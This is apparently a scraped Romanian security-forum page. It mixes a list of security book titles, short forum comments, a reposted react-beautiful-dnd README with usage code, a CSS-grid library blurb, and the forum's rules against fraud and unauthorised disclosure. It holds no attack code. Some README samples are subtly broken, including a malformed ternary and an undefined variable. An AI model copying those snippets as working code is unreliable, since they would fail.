Relational Databases Multimedia Content Encryption, Techniques and Applications Multimedia Encryption and Authentication Techniques and Applications Multimedia Security Handbook Multimedia Security, Watermarking, Steganography, and Forensics Multimedia Watermarking Techniques and Applications Multiple-Base Number System, Theory and Applications Network and Application Security, Fundamentals and Practices Network Anomaly Detection, A Machine Learning Perspective Network Attacks and Defenses, A Hands-on Approach Network Perimeter Security, Building Defense In-Depth Network Security Technologies New Directions of Modern Cryptography Noiseless Steganography, The Key to Covert Communications Official (ISC)2 Guide to the CISSP CBK Official (ISC)2 Guide to the CISSP CBK, Second Edition Official (ISC)2 Guide to the CISSP CBK, Third Edition Official (ISC)2 Guide to the CISSP Exam Official (ISC)2 Guide to the CSSLP Official (ISC)2 Guide to the CSSLP CBK, Second Edition Official (ISC)2 Guide to the HCISPP CBK Official (ISC)2 Guide to the SSCP CBK Official (ISC)2 Guide to the SSCP CBK, Second Edition Official (ISC)2® Guide to the CAP® CBK®, Second Edition Official (ISC)2® Guide to the CCFP CBK Official (ISC)2® Guide to the ISSAP® CBK Official (ISC)2® Guide to the ISSAP® CBK, Second Edition Official (ISC)2® Guide to the ISSEP® CBK®, Second Edition Official (ISC)2® Guide to the ISSMP® CBK® Optical Coding Theory with Prime Oracle Identity Management, Governance, Risk, and Compliance Architecture, Third Edition PCI Compliance, The Definitive Guide Pearls of Discrete Mathematics Physical Security and Safety, A Field Guide for the Practitioner Practical Cryptography, Algorithms and Implementations Using C++ Practical Hacking Techniques and Countermeasures Practical Risk Management for the CIO PRAGMATIC Security Metrics, Applying Metametrics to Information Security Privacy-Aware Knowledge Discovery, Novel Applications and New Techniques Profiling Hackers, The Science of Criminal Profiling as Applied to the World of Hacking Protocols for Secure Electronic Commerce, Second Edition Public Key Infrastructure, Building Trusted Applications and Web Services Quantum Communications and Cryptography RC4 Stream Cipher and Its Variants Responsive Security, Be Ready to Be Secure RSA and Public-Key Cryptography Secure and Resilient Software Development Secure and Resilient Software, Requirements, Test Cases, and Testing Methods Secure Computers and Networks, Analysis, Design, and Implementation Secure Data Provenance and Inference Control with Semantic Web Secure Internet Practices, Best Practices for Securing Systems in the Internet and e-Business Age Secure Java, For Web Application Development Secure Semantic Service-Oriented Systems Securing and Controlling Cisco Routers Securing Cloud and Mobility, A Practitioner's Guide Securing Converged IP Networks Securing E-Business Applications and Communications Securing Systems, Applied Security Architecture and Threat Models Securing Windows NT/2000, From Policies to Firewalls Security and Policy Driven Computing Security and Privacy in Smart Grids Security De-Engineering, Solving the Problems in Information Risk Management Security for Service Oriented Architectures Security for Wireless Sensor Networks using Identity-Based Cryptography Security in an IPv6 Environment Security in Distributed, Grid, Mobile, and Pervasive Computing Security in RFID and Sensor Networks Security Management, A Critical Thinking Approach Security of Mobile Communications Security Patch Management Security Software Development, Assessing and Managing Security Risks Security Strategy, From Requirements to Reality Security without Obscurity, A Guide to Confidentiality, Authentication, and Integrity Smart Grid Security, An End-to-End View of Security in the New Electrical Grid Software Deployment, Updating, and Patching Software Test Attacks to Break Mobile and Embedded Devices Standard for Auditing Computer Applications, Second Edition Statistical Methods in Computer Security Strategic Information Security Surviving Security, How to Integrate People, Process, and Technology Testing Code Security The ABCs of LDAP, How to Install, Run, and Administer LDAP Services The CISO Handbook, A PRACTICAL GUIDE TO SECURING YOUR COMPANY The Complete Book of Data Anonymization, From Planning to Implementation The Definitive Guide to Complying with the HIPAA/HITECH Privacy and Security Rules The Ethical Hack, A Framework for Business Value Penetration Testing The Hacker's Handbook, The Strategy Behind Breaking into and Defending Networks The Laws of Software Process, A New Model for the Production and Management of Software The Practical Guide to HIPAA Privacy and Security Compliance The Practical Guide to HIPAA Privacy and Security Compliance, Second Edition The Privacy Papers, Managing Technology, Consumer, Employee and Legislative Actions The Security Risk Assessment Handbook, A Complete Guide for Performing Security Risk Assessments The Security Risk Assessment Handbook, A Complete Guide for Performing Security Risk Assessments, Second Edition The State of the Art in Intrusion Prevention and Detection The Total CISSP Exam Prep Book, Practice Questions, Answers, and Test Taking Tips and Techniques Trade Secret Theft, Industrial Espionage, and the China Threat Unauthorized Access, The Crisis in Online Privacy and Security Understanding Surveillance Technologies, Spy Devices, Privacy, History & Applications, Second Edition Understanding Surveillance Technologies, Spy Devices, Their Origins & Applications UNIX Administration, A Comprehensive Sourcebook for Effective Systems & Network Management Using the Common Criteria for IT Security Evaluation Vein Pattern Recognition, A Privacy-Enhancing Biometric Verification of Computer Codes in Computational Science and Engineering Visual Cryptography and Secret Image Sharing Vulnerability Management Watermarking Systems Engineering, Enabling Digital Assets Security and Other Applications Web Security, A WhiteHat Perspective What Every Engineer Should Know About Cyber Security and Digital Forensics Windows Networking Tools, The Complete Guide to Management, Troubleshooting, and Security Wireless Crime and Forensic Investigation Wireless Multimedia Communication Systems, Design, Analysis, and Implementation Wireless Security

Bun pentru cazurile in care cheia e un string. Daca e cheie RSA, nasol. @TheTime alternativa la cel scris in C#.

Pac, pac, i-au ciuruit http://www.nydailynews.com/entertainment/tv/arrests-made-game-thrones-episode-leak-article-1.3410972 Probabil nu sunt aceeasi entitate care au cerut meleoanele... dar totusi. #indieni #foame

Beautiful, accessible drag and drop for lists with React.js Examples See how beautiful it is for yourself - have a play with the examples! Core characteristics: beautiful, natural movement of items clean and powerful api which is simple to get started with unopinionated styling no creation of additional wrapper dom nodes - flexbox and focus management friendly! plays well with existing interactive nodes such as anchors state driven dragging - which allows for dragging from many input types, including programatic dragging. Currently only mouse and keyboard dragging are supported Why not react-dnd? There are a lot of libraries out there that allow for drag and drop interactions within React. Most notable of these is the amazing react-dnd. It does an incredible job at providing a great set of drag and drop primitives which work especially well with the wildly inconsistent html5 drag and drop feature. react-beautiful-dnd is a higher level abstraction specifically built for vertical and horizontal lists. Within that subset of functionality react-beautiful-dnd offers a powerful, natural and beautiful drag and drop experience. However, it does not provide the breadth of functionality offered by react-dnd. So this library might not be for you depending on what your use case is. Still young! This library is still fairly new and so there is a relatively small feature set. Be patient! Things will be moving rather quickly! Currently supported feature set dragging an item within a single vertical list multiple independent lists on the one page mouse and keyboard dragging flexible height items (the draggable items can have different heights) custom drag handle (you can drag a whole item by just a part of it) the vertical list can be a scroll container (without a scrollable parent) or be the child of a scroll container (that also does not have a scrollable parent) Short term backlog Dragging within a horizontal list Moving items between vertical lists (until this lands conditional dropping will not be available) Medium term backlog Moving items between horizontal lists Moving a Draggable from a vertical list to a horizontal list Dragging multiple items at once Long term backlog Touch support Automatically disabling animations when the frame rate drops below a threshold. A mechanism to programatically perform dragging without user input And lots more! Basic usage example This is a simple reorderable list. You can play with it on webpackbin import React, { Component } from 'react'; import ReactDOM from 'react-dom'; import { DragDropContext, Droppable, Draggable } from 'react-beautiful-dnd'; // fake data generator const getItems = (count) => Array.from({length: count}, (v, k) => k).map(k => ({ id: `item-${k}`, content: `item ${k}` })); // a little function to help us with reordering the result const reorder = (list, startIndex, endIndex) => { const result = Array.from(list); const [removed] = result.splice(startIndex, 1); result.splice(endIndex, 0, removed); return result; }; // using some little inline style helpers to make the app look okay const grid = 8; const getItemStyle = (draggableStyle, isDragging) => ({ // some basic styles to make the items look a bit nicer userSelect: 'none', padding: grid * 2, marginBottom: grid, // change background colour if dragging background: isDragging ? 'lightgreen' : 'grey', // styles we need to apply on draggables ...draggableStyle }); const getListStyle = (isDraggingOver) => ({ background: isDraggingOver ? 'lightblue' : 'lightgrey', padding: grid, width: 250 }); class App extends Component { constructor(props) { super(props); this.state = { items: getItems(10) } this.onDragEnd = this.onDragEnd.bind(this); } onDragEnd (result) { // dropped outside the list if(!result.destination) { return; } const items = reorder( this.state.items, result.source.index, result.destination.index ); this.setState({ items }); } // Normally you would want to split things out into separate components. // But in this example everything is just done in one place for simplicity render() { return ( <DragDropContext onDragEnd={this.onDragEnd}> <Droppable droppableId="droppable"> {(provided, snapshot) => ( <div ref={provided.innerRef} style={getListStyle(snapshot.isDraggingOver)} > {this.state.items.map(item => ( <Draggable key={item.id} draggableId={item.id} > {(provided, snapshot) => ( <div> <div ref={provided.innerRef} style={getItemStyle( provided.draggableStyle, snapshot.isDragging )} {...provided.dragHandleProps} > {item.content} </div> {provided.placeholder} </div> )} </Draggable> ))} </div> )} </Droppable> </DragDropContext> ); } } // Put the thing into the DOM! ReactDOM.render(<App />, document.getElementById('app')); Core design principle Drag and drop with react-beautiful-dnd is supposed to feel physical and natural - similar to that of moving physical objects around. Things should never 'snap' anywhere. Rather, everything should move naturally as much as possible. Application 1: knowing when to move Draggables will move into their new position based on their center of gravity. Regardless of where a user grabs an item from - the movement of other things is based on its center position. This is similar to a set of scales . Here are some rules that are followed to allow for a natural drag experience even with items of flexible height: A Droppable is dragged over when the center position of a dragging item goes over one of the boundaries of the Droppable A resting Draggable will move out of the way of a dragging Draggable when the center position of the dragging Draggable goes over the edge of the resting Draggable. Put another way: once the center position of a Draggable (A) goes over the edge of another Draggable (B), B moves out of the way. Application 2: no drop shadows Drop shadows are useful in an environment where items and their destinations snap around. However, with react-beautiful-dnd it should be obvious where things will be dropping based on the movement of items. This might be changed in the future - but the experiment is to see how far we can get without any of these affordances. Sloppy clicks and click blocking A drag will not start until a user has dragged their mouse past a small threshold. If this threshold is not exceeded then the library will not impact the mouse click and will release the event to the browser. When a user presses the mouse down on an element, we cannot determine if the user was clicking or dragging. If the sloppy click threshold was not exceeded then the event will be treated as if it where a click and the click event will bubble up unmodified. If the user has started dragging by moving the mouse beyond the sloppy click threshold then the click event will be prevented. This behavior allows you to wrap an element that has click behavior such as an anchor and have it work just like a standard anchor while also allowing it to be dragged. is a schrodinger's cat joke) Focus management react-beautiful-dnd does not create any wrapper elements. This means that it will not impact the usage tab flow of a document. For example, if you are wrapping an anchor tag then the user will tab to the anchor directly and not an element surrounding the anchor. Whatever element you wrap will be given a tab-index to ensure that users can tab to the element to perform keyboard dragging. Keyboard dragging Traditionally drag and drop interactions have been exclusively a mouse or touch interaction. This library supports drag and drop interactions using only a keyboard. This enables power users to drive more of our interfaces with a keyboard. It also opens drag and drop interactions to those who previously would be unable to use them due to an impediment. Shortcuts Currently the keyboard handling is hard coded. This could be changed in the future to become customisable. Here is the existing keyboard mapping: tab ↹ - standard browser tabbing will navigate through the Droppable's. The library does not do anything fancy with tab while users are selecting. Once a drag has started, tab is blocked for the duration of the drag. spacebar - lift a focused Draggable. Also, drop a dragging Draggable where the drag was started with a spacebar. Up arrow ↑ - move a Draggable that is dragging up on a vertical list Down arrow ↓ - move a Draggable that is dragging down on a vertical list Escape esc - cancel an existing drag - regardless of whether the user is dragging with the keyboard or mouse. Limitations of keyboard dragging There is a currently limitation of keyboard dragging: the drag will cancel if the user scrolls the window. This could be worked around but for now it is the simpliest initial approach. Installation # yarn yarn add react-beautiful-dnd # npm npm install react-beautiful-dnd --save API So how do you use the library? DragDropContext In order to use drag and drop, you need to have the part of your react tree that you want to be able to use drag and drop in wrapped in a DragDropContext. It is advised to just wrap your entire application in a DragDropContext. Having nested DragDropContext's is not supported. You will be able to achieve your desired conditional dragging and dropping using the props of Droppable and Draggable. You can think of DragDropContext as having a similar purpose to the react-redux Provider component Prop type information type Hooks = {| onDragStart?: (id: DraggableId, location: DraggableLocation) => void, onDragEnd: (result: DropResult) => void, |} type Props = Hooks & {| children?: ReactElement, |} Basic usage import { DragDropContext } from 'react-beautiful-dnd'; class App extends React.Component { onDragStart = () => {...} onDragEnd = () => {...} render() { return ( <DragDropContext onDragStart={this.onDragStart} onDragEnd={this.onDragEnd} > <div>Hello world</div> </DragDropContext> ) } } Hooks These are top level application events that you can use to perform your own state updates. onDragStart (optional) This function will get notified when a drag starts. You are provided with the following details: id: the id of the Draggable that is now dragging location: the location (droppableId and index) of where the dragging item has started within a Droppable. This function is optional and therefore does not need to be provided. It is highly recommended that you use this function to block updates to all Draggable and Droppable components during a drag. (See Best hooks practices) Type information onDragStart?: (id: DraggableId, location: DraggableLocation) => void // supporting types type Id = string; type DroppableId: Id; type DraggableId: Id; type DraggableLocation = {| droppableId: DroppableId, // the position of the draggable within a droppable index: number |}; onDragEnd (required) This function is extremely important and has an critical role to play in the application lifecycle. This function must result in the synchronous reordering of a list of Draggables It is provided with all the information about a drag: result: DragResult result.draggableId: the id of the Draggable was dragging. result.source: the location that the Draggable started in. result.destination: the location that the Draggable finished in. The destination will be null if the user dropped into no position (such as outside any list) or if they dropped the Draggable back into the same position that it started in. Synchronous reordering Because this library does not control your state, it is up to you to synchronously reorder your lists based on the result. Here is what you need to do: if the destination is null: all done! if source.droppableId equals destination.droppableId you need to remove the item from your list and insert it at the correct position. if source.droppableId does not equal destination.droppable you need to the Draggable from the source.droppableId list and add it into the correct position of the destination.droppableId list. Type information onDragEnd: (result: DropResult) => void // supporting types type DropResult = {| draggableId: DraggableId, source: DraggableLocation, // may not have any destination (drag to nowhere) destination: ?DraggableLocation |} type Id = string; type DroppableId: Id; type DraggableId: Id; type DraggableLocation = {| droppableId: DroppableId, // the position of the droppable within a droppable index: number |}; Best practices for hooks Block updates during a drag It is highly recommended that while a user is dragging that you block any state updates that might impact the amount of Draggables and Droppables, or their dimensions. Please listen to onDragStart and block updates to the Draggables and Droppables until you receive at onDragEnd. When the user starts dragging we take a snapshot of all of the dimensions of the applicable Draggable and Droppable nodes. If these change during a drag we will not know about it. Here are a few poor user experiences that can occur if you change things during a drag: If you increase the amount of nodes the library will not know about them and they will not be moved when the user would expect them to be. If you decrease the amount of nodes then there might be gaps and unexpected movements in your lists. If you change the dimensions of any node, it can cause the changed node as well as others to move at incorrect times. If you remove the node that the user is dragging the drag will instantly end If you change the dimension of the dragging node then other things will not move out of the way at the correct time. onDragStart and onDragEnd pairing We try very hard to ensure that each onDragStart event is paired with a single onDragEnd event. However, there maybe a rouge situation where this is not the case. If that occurs - it is a bug. Currently there is no mechanism to tell the library to cancel a current drag externally. Style During a drag it is recommended that you add two styles to the body: user-select: none; and cursor: grab; (or whatever cursor you want to use while dragging) user-select: none; prevents the user drag from selecting text on the page as they drag. cursor: [your desired cursor]; is needed because we apply pointer-events: none; to the dragging item. This prevents you setting your own cursor style on the Draggable directly based on snapshot.isDragging (see Draggable). Dynamic hooks Your hook functions will only be captured once at start up. Please do not change the function after that. If there is a valid use case for this then dynamic hooks could be supported. However, at this time it is not. Droppable Droppable components can be dropped on by a Draggable. They also contain Draggables. A Draggable must be contained within a Droppable. import { Droppable } from 'react-beautiful-dnd'; <Droppable droppableId="droppable-1" type="PERSON" > {(provided, snapshot) => ( <div ref={provided.innerRef} style={{backgroundColor: snapshot.isDraggingOver ? 'blue' : 'grey'}} > I am a droppable! </div> )} </Droppable> Props droppableId: A required DroppableId(string) that uniquely identifies the droppable for the application. Please do not change this prop - especially during a drag. type: An optional TypeId(string) that can be used to simply accept a class of Draggable. For example, if you use the type PERSON then it will only allow Draggables of type PERSON to be dropped on itself. Draggables of type TASK would not be able to be dropped on a Droppable with type PERSON. If no type is provided, it will be set to 'DEFAULT'. Currently the type of the Draggables within a Droppable must be the same. This restriction might be loosened in the future if there is a valid use case. isDropDisabled: An optional flag to control whether or not dropping is currently allowed on the Droppable. You can use this to implement your own conditional dropping logic. It will default to false. Children function The React children of a Droppable must be a function that returns a ReactElement. <Droppable droppableId="droppable-1"> {(provided, snapshot) => ( // ... )} </Droppable> The function is provided with two arguments: 1. provided: (Provided) type Provided = {| innerRef: (HTMLElement) => mixed, |} In order for the droppable to function correctly, you must bind the provided.innerRef to the highest possible DOM node in the ReactElement. We do this in order to avoid needing to use ReactDOM to look up your DOM node. <Droppable droppableId="droppable-1"> {(provided, snapshot) => ( <div ref={provided.innerRef}> Good to go </div> )} </Droppable> 2. snapshot: (StateSnapshot) type StateSnapshot = {| isDraggingOver: boolean, |} The children function is also provided with a small about of state relating to the current drag state. This can be optionally used to enhance your component. A common use case is changing the appearance of a Droppable while it is being dragged over. <Droppable droppableId="droppable-1"> {(provided, snapshot) => ( <div ref={provided.innerRef} style={{backgroundColor: snapshot.isDraggingOver ? 'blue' : 'grey'}} > I am a droppable! </div> )} </Droppable> Conditionally dropping Keep in mind that this is not supported at this time. In this current initial version we only support reordering within a single list. Droppables can only be dropped on by Draggables who share the same type. This is a simple way of allowing conditional dropping. If you do not provide a type for the Droppable then it will only accept Draggables which also have the default type. Draggables and Droppables both will have their types set to 'DEFAULT' when none is provided. There is currently no way to set multiple types, or a type wildcard that will accept Draggables of multiple any types. This could be added if there is a valid use case. Using the isDropDisabled prop you can conditionally allow dropping. This allows you to do arbitrarily complex conditional transitions. This will only be considered if the type of the Droppable matches the type of the currently dragging Draggable. You can disable dropping on a Droppable altogether by always setting isDropDisabled to false. You can do this to create a list that is never able to be dropped on, but contains Draggables. Technically you do not need to use type and do all of your conditional drop logic with the isDropDisabled function. The type parameter is a convenient shortcut for a common use case. Scroll containers This library supports dragging within scroll containers (DOM elements that have overflow: auto; or overflow: scroll;). The only supported use cases are: The Droppable can itself be a scroll container with no scrollable parents The Droppable has one scrollable parent Auto scrolling is not provided Currently auto scrolling of scroll containers is not part of this library. Auto scrolling is where the container automatically scrolls to make room for the dragging item as you drag near the edge of a scroll container. You are welcome to build your own auto scrolling list, or if you would you really like it as part of this library we could provide a auto scrolling Droppable. Users will be able to scroll a scroll container while dragging by using their trackpad or mouse wheel. Keyboard dragging limitation Getting keyboard dragging to work with scroll containers is quite difficult. Currently there is a limitation: you cannot drag with a keyboard beyond the visible edge of a scroll container. This limitation could be removed if we introduced auto scrolling. Draggable Draggable components can be dragged around and dropped onto Droppables. A Draggable must always be contained within a Droppable. It is possible to reorder a Draggable within its home Droppable or move to another Droppable. It is possible because a Droppable is free to control what it allows to be dropped on it. Note: moving between Droppables is currently not supported in the initial version. import { Draggable } from 'react-beautiful-dnd'; <Draggable draggableId="draggable-1" type="PERSON" > {(provided, snapshot) => ( <div> <div ref={draggableProvided.innerRef} style={draggableProvided.draggableStyle} {...draggableProvided.dragHandleProps} > <h4>My draggable</h4> </div> {provided.placeholder} </div> )} </Draggable> Note: when the library moves to React 16 this will be cleaned up a little bit as we will be able to return the placeholder as a sibling to your child function without you needing to create a wrapping element Props draggableId: A required DraggableId(string) that uniquely identifies the Draggable for the application. Please do not change this prop - especially during a drag. type: An optional type (TypeId(string)) of the Draggable. This is used to control what Droppables the Draggable is permitted to drop on. Draggables can only drop on Droppables that share the same type. If no type is provided, it will be set to 'DEFAULT'. Currently the type of a Draggable must be the same as its container Droppable. This restriction might be loosened in the future if there is a valid use case. isDragDisabled: An optional flag to control whether or not dropping is currently allowed on the Droppable. You can use this to implement your own conditional dropping logic. It will default to false. Children function The React children of a Draggable must be a function that returns a ReactElement. <Draggable draggableId="draggable-1"> {(provided, snapshot) => ( <div> <div ref={provided.innerRef} style={provided.draggableStyle} {...provided.dragHandleProps} > Drag me! </div> {provided.placeholder} </div> )} </Draggable> The function is provided with two arguments: 1. provided: (Provided) type Provided = {| innerRef: (HTMLElement) => void, draggableStyle: ?DraggableStyle, dragHandleProps: ?DragHandleProvided, placeholder: ?ReactElement, |} Everything within the provided object must be applied for the Draggable to function correctly. provided.innerRef (innerRef: (HTMLElement) => void): In order for the Droppable to function correctly, you must bind the innerRef function to the ReactElement that you want to be considered the Draggable node. We do this in order to avoid needing to use ReactDOM to look up your DOM node. <Draggable draggableId="draggable-1"> {(provided, snapshot) => ( <div ref={provided.innerRef}> Drag me! </div> )} </Draggable> Type information innerRef: (HTMLElement) => void provided.draggableStyle (?DraggableStyle): This is an Object or null that contains an a number of styles that needs to be applied to the Draggable. This needs to be applied to the same node that you apply provided.innerRef to. The controls the movement of the draggable when it is dragging and not dragging. You are welcome to add your own styles to this object - but please do not remove or replace any of the properties. Ownership It is a contract of this library that it own the positioning logic of the dragging element. This includes properties such as top, right, bottom, left and transform. The library may change how it positions things and what properties it uses without performing a major version bump. It is also recommended that you do not apply your own transition property to the dragging element. <Draggable draggableId="draggable-1"> {(provided, snapshot) => ( <div> <div ref={provided.innerRef} style={provided.draggableStyle} > Drag me! </div> </div> )} </Draggable> Extending with your own styles <Draggable draggable="draggable-1"> {(provided, snapshot) => { const style = { ...provided.draggableStyle, backgroundColor: snapshot.isDragging : 'blue' : 'white', fontSize: 18, } return ( <div> <div ref={provided.innerRef} style={style} > Drag me! </div> </div> ); }} </Draggable> Type information type DraggableStyle = DraggingStyle | NotDraggingStyle; type DraggingStyle = {| position: 'fixed', boxSizing: 'border-box', // allow scrolling of the element behind the dragging element pointerEvents: 'none', zIndex: ZIndex, width: number, height: number, top: number, left: number, transform: ?string, |} type NotDraggingStyle = {| transition: ?string, transform: ?string, pointerEvents: 'none' | 'auto', |} provided.placeholder (?ReactElement) The Draggable element has position:fixed applied to it while it is dragging. The role of the placeholder is to sit in the place that the Draggable was during a drag. It is needed to stop the Droppable list from collapsing when you drag. It is advised to render it as a sibling to the Draggable node. When the library moves to React 16 the placeholder will be removed from api. <Draggable draggableId="draggable-1"> {(provided, snapshot) => ( <div> <div ref={provided.innerRef} style={provided.draggableStyle} > Drag me! </div> {/* Always render me - I will be null if not required */} {provided.placeholder} </div> )} </Draggable> provided.dragHandleProps (?DragHandleProps) every Draggable has a drag handle. This is what is used to drag the whole Draggable. Often this will be the same as the node as the Draggable, but sometimes it can be a child of the Draggable. DragHandleProps need to be applied to the node that you want to be the drag handle. This is a number of props that need to be applied to the Draggable node. The simpliest approach is to spread the props onto the draggable node ({...provided.dragHandleProps}). However, you are also welcome to monkey patch these props if you also need to respond to them. DragHandleProps will be null when isDragDisabled is set to true. Type information type DragHandleProps = {| onMouseDown: (event: MouseEvent) => void, onKeyDown: (event: KeyboardEvent) => void, onClick: (event: MouseEvent) => void, tabIndex: number, 'aria-grabbed': boolean, draggable: boolean, onDragStart: () => void, onDrop: () => void |} Standard example <Draggable draggableId="draggable-1"> {(provided, snapshot) => ( <div> <div ref={provided.innerRef} style={provided.draggableStyle} {...provided.dragHandleProps} > Drag me! </div> {provided.placeholder} </div> )} </Draggable> Custom drag handle <Draggable draggableId="draggable-1"> {(provided, snapshot) => ( <div> <div ref={provided.innerRef} style={provided.draggableStyle} > <h2>Hello there</h2> <div {...provided.dragHandleProps}> Drag handle </div> </div> {provided.placeholder} </div> )} </Draggable> Monkey patching If you want to also use one of the props in DragHandleProps const myOnClick = (event) => console.log('clicked on', event.target); <Draggable draggableId="draggable-1"> {(provided, snapshot) => { const onClick = (() => { // dragHandleProps might be null if(!provided.dragHandleProps) { return myOnClick; } // creating a new onClick function that calls my onClick // event as well as the provided one. return (event) => { provided.dragHandleProps.onClick(event); // You may want to check if event.defaultPrevented // is true and optionally fire your handler myOnClick(event); } })(); return ( <div> <div ref={provided.innerRef} style={provided.draggableStyle} {...provided.dragHandleProps} onClick={onClick} > Drag me! </div> {provided.placeholder} </div> ); }} </Draggable> 2. snapshot: (StateSnapshot) type StateSnapshot = {| isDragging: boolean, |} The children function is also provided with a small about of state relating to the current drag state. This can be optionally used to enhance your component. A common use case is changing the appearance of a Draggable while it is being dragged. Note: if you want to change the cursor to something like grab you will need to add the style to the body. (See DragDropContext > style above) <Draggable draggableId="draggable-1"> {(provided, snapshot) => { const style = { ...provided.draggableStyle, backgroundColor: snapshot.isDragging ? 'blue' : 'grey', }; return ( <div> <div ref={provided.innerRef} style={style} {...provided.dragHandleProps} > Drag me! </div> {provided.placeholder} </div> ); }} </Draggable> Engineering health Typed This codebase is typed with flowtype to promote greater internal consistency and more resilient code. Tested This code base employs a number of different testing strategies including unit, performance and integration tests. Testing various aspects of the system helps to promote its quality and stability. While code coverage is not a guarantee of code health, it is a good indicator. This code base currently sits at ~95% coverage. Performance This codebase is designed to be extremely performant - it is part of its DNA. It builds on prior investigations into React performance that you can read about here and here. It is designed to perform the minimum number of renders required for each task. Highlights using connected-components with memoization to ensure the only components that render are the ones that need to - thanks react-redux, reselect and memoize-one all movements are throttled with a requestAnimationFrame - thanks raf-schd memoization is used all over the place - thanks memoize-one conditionally disabling pointer-events on Draggables while dragging to prevent the browser needing to do redundant work Minimal browser paints Minimal React updates Supported browsers This library supports the standard Atlassian supported browsers for desktop: Desktop Version Microsoft Internet Explorer(Windows) Version 11 Microsoft Edge Latest stable version supported Mozilla Firefox (all platforms) Latest stable version supported Google Chrome (Windows and Mac) Latest stable version supported Safari (Mac) Latest stable version on latest OS release supported Currently mobile is not supported. However, there are plans to add touch support in the future Author / maintainer Alex Reardon - @alexandereardon - areardon@atlassian.com Download react-beautiful-dnd-master.zip Source: https://github.com/atlassian/react-beautiful-dnd

EqualizeCss - is light-weighted css-grid built on the properties of flexboxes and written on the sass. Using it you can easily build adaptive sites and web applications, manage columns and markup the necessary styles only by substituting. Class names coincide with other popular css-frameworks, so moving to it will be very easy. Documentation Install with npm: $ npm install equalizecss --save with browser: $ bower install equalizecss with yarn: $ yarn add equalizecss Download equalizecss-master.zip Source: https://equalizecss.com/

Ma gandeam sa fac putin misto de el pentru asta: dar vad in postarile anterioare ca si limba materna il doboara in mod.. napraznic. Tragi-comic e si (asa-zisa)conditia: Daca i-ar scrie cineva un articol, care are un vocabular mai bogat si eventual foloseste ceva epitete mai putin uzuale, cred ca s-ar speria, crezand ca il injura de mama. Trist, la 20 ani sau cat se da ca are.. flacau in toata regula si cu creierul neted Cine o sa va plateasca bre pensiile?

A fost publicata agenda. https://www.owasp.org/index.php/OWASP_Bucharest_AppSec_Conference_2017#tab=Conference_0101_talks https://www.owasp.org/index.php/OWASP_Bucharest_AppSec_Conference_2017#tab=Conference_1010_talks

Hirens boot ... ai acolo tot ceea ce ai nevoie.

[RO] Termeni si conditii - Administratorii acestui website nu isi asuma nicio responsabilitate pentru continutul acestui forum! Fiecare utilizator este responsabil pentru continutul creat! - Administratorii nu sunt responsabili pentru problemele aparute in urma folosirii informatiilor de pe acest website! - Administratorii acestui website nu isi asuma nicio responsabilitate pentru pagubele rezultate in urma vanzarii, cumpararii sau schimbului de bunuri sau servicii pe acest website! - Avem toleranta 0 pentru frauda sau informatii care faciliteaza frauda online sau bancara, inclusiv prin mesajele private (skimming, CC-uri, root-uri etc.). Orice abatere de la aceasta regula se pedepseste prin interzicerea permanenta pe website, iar datele voastre vor fi oferite organelor competente dac? ni se va cere acest lucru. De asemenea, administratorii isi rezerva dreptul de a interzice utilizatorilor accesul pe website in urma oricarei posibile activitati care pot fi legate de frauda online sau bancara. - Se interzice publicarea de continut ilegal sau fara drepturi de autor! Este interzisa publicarea de date cu caracter personal, conturi care nu va apartin, informatii de acces la diferite servere sau website-uri sau orice altceva care nu va apartine si care nu respecta legislatia in vigoare! - Acest website nu gazduieste fisiere fara drepturi de autor ci doar legaturi catre diferite servicii externe. Administratorii acestui website nu isi asuma responsabilitatea pentru continutul prezent pe servicii externe. Daca sunteti posesorii drepturilor de autor pentru informatii publicate pe acest website, luati legatura cu unul dintre administratori pentru eliminarea continutului. - Prin accesarea acestui website sunteti de acord cu termenii si conditiile si cu regulamentul acestui website! [RO] Avertisemente, interzicere temporara sau permanenta In urma abaterii de la regulile acestui forum, utilizatorii pot fi avertizati (warn) sau li se poate interzice accesul pe forum (ban) temporar sau permanent. Administratorii si moderatorii acestui website sunt cei care decid pedeapsele pentru incalcarea regulilor. Daca considerati ca pedeapsa (warn sau ban) nu este justificata, luati legatura cu unul dintre administratorii acestui website. Actiuni pentru care veti primi un avertisment (warn): - Off-topic - Daca va abateti de la tema de discutie a unui subiect - Post dublu - Nu faceti mai multe posturi consecutive - Post inutil - Nu potati doar de dragul de a posta ci doar daca aveti ceva util de spus - Redeschidere topic - Verificati daca ultimului post intr-un topic, daca nu s-a mai postat de cativa ani nu postati nici voi - Insultare membru - Fara atacuri la persoana sau injuraturi - Nume inadecvat - Pentru un topic, alegeti un titlu care sa rezume postul - Limbaj inadecvat - Respectati regulile gramaticale, fara sh, tz sau altceva, nu sunteti pe IRC - Link-uri cu referral - Fara adf.ly sau alte mizerii - Crearea unui cont pe forum doar pentru a cere invitatii pe trackere, alte forumuri, etc. - Altul: orice abatere care nu se incadreaza in aceste categorii Pentru multiple avertismente rezultatul poate fi banarea temporara sau permanenta, astfel: - pentru 3 avertismente - ban 5 zile - pentru 4 avertismente - ban 30 de zile - pentru 5 avertismente - ban permanent [RO] Reguli 1. Nu postati si nu cereti root-uri, vpn-uri, smtp-uri etc. 2. Oferiti credite si dati sursele originale. Daca veti copia un link sau un tutorial de pe alt site/forum/blog, oferiti credite autorului initial. 3. Unele categorii (ca Free Stuff sau RST Market) au regulament intern. Verifica daca exista un regulament sticky inainte de a posta intr-o anumita categorie. 4. Fiecare tutorial, program sau lucruri asemanatoare trebuie insotite de o descriere in romana sau engleza. Linkurile catre programe trebuie sa fie catre site-ul oficial al acelui program sau tutorial. 5. Publicarea datelor personale sau tentative de acest gen ale oricarui individ duce la ban permanent. 6. Nu cereti VIP, Moderator sau alte ranguri pentru ca nu le veti primi. Daca vom avea nevoie va vom cauta noi. 7. Un moderator/administrator are dreptul sa zboare pe oricine doreste de pe forum, cu atat mai mult daca consider? ca acea persoan? este inutila pentru forum. 8. Exista buton de report post. Nu atrageti aten?ia prin mesaje publice pentru ca veti primi avertisment. Eventual dati mesaj privat acelui utilizator. 9. Nu aveti voie sa faceti proiecte sau prezentari in numele RST fara acordul unuia dintre administratori. 10. Nu aveti voie sa injurati pe chat sau sa faceti atacuri la persoana. Nerespectarea acestei reguli duce la sanctionarea prin Kick si ulterior prin BAN pe chat. 11. Crearea a mai mult de 1 cont pe persoana duce automat la banarea tuturor conturilor. 12. Postarea de vulnerabilitati in site-uri care nu au un program bug-bounty si care nu ofera un cadru legal pentru raportarea vulnerabilitatilor este interzisa. Administratorii RST au dreptul de a modifica oricand Termenii si conditiile si Regulamentul acestui website fara o notificare in prealabil. [RO] Regulament categorii: Free stuff - Nu se accepta root-uri, smtp-uri, vps-uri, 